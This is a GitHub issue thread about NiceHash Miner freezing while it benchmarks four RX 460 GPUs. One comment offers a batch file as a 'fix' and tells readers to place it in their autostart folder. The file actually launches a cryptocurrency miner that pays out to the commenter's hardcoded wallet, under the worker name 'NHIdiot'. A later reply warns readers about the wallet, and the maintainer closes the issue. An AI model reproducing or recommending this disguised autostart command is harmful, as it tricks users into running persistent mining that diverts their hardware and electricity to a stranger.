### ISSUE TITLE
NHML freezes when I try benchmarking 

### ISSUE THREAD

**Issue by GrimHedgehog** [nicehash/NiceHashMiner#751]
I have four RX 460's and I just had to roll them back to a driver version released in September so I could stop getting a VIDEO_TDR_Failure. Now I am trying to run nhml and benchmark all my GPU's and it just ends up freezing after it gets through one or two benchmarks. Not sure what to do...

**Comment by kaingth151** [comment]
ccminer.exe --help

**Comment by Jakobhoss** [comment]
Simply make a .bat file with exact this text
Only change the information about the NiceHash folder and put it into your autostart folder!

setx GPU_FORCE_64BIT_PTR 0
setx GPU_MAX_HEAP_SIZE 100
setx GPU_USE_SYNC_OBJECTS 1
setx GPU_SINGLE_ALLOC_PERCENT 100
setx GPU_MAX_ALLOC_PERCENT 100
<Your NH LEGACY FOLDER\bin_3rdparty\claymore_cryptonight\NsGPUCNMINER -xpool stratum+ssl://etn-eu2.nanopool.org:13433 -xwal etnjx5yvXLheSRw7Ed5yqbh3RxrPQAbvsimVoUEkzizoNEajuVBTbCdTDxgWE8vdkV9gEi78gFweWJJXjvUjuurf646whtvunT.NHIdiot -xpsw x -allpools 1 -nofee 1 -di 0123 -h 512,512,512,512

Works 100% you´ll have to wait for some hours till you see first results but it´s worth it!

**Comment by SaintPistachio** [comment]
Do not forgot to change the wallet address otherwise you will just mine for someone else. ;)

**Comment by S74nk0** [comment]
Issue related to old nhm version/build. Please use latest version and open a new issue for bugs and/or features.
